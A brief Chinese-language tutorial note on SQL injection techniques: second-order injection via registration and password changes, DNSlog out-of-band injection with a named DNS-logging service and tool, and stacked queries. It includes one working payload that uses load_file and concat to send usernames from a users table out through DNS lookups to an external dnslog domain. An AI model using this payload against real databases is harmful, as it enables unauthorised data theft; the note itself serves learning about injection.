数据库注入小细节
二次注入 通过登入注册将语句写入数据库中 通过修改密码之类的使其被调用 从而完成二次注入
dnslog注入 在sql注入时为布尔盲注、时间盲注,注入的效率低且线程高容易被waf拦截,又或者是目标站点没有回显,我们在读取文件、执行命令注入等操作时无法明显的确认是否利用成功, 网站回显网站dns有 http://ceye.io/ 注入工具 https://github.com/ADOOO/DnslogSqlinj 需要把网站dns的 identifie 和 token 导入到工具中
每一级域名长度是63个字符超出了就是错误不查询 group_concat联合查询会自动用','进行分割 域名地址只能出现数字,字母,下划线; 通过replace将','转换'——' 所以代码可以写成 select load_file(concat('\\\\',(select SUBSTR(replace((group_concat(username )),',','_'),1,63) from users),'.qnpqsu.dnslog.cn/abc'))
堆叠 通过;进行多个sql语句同时执行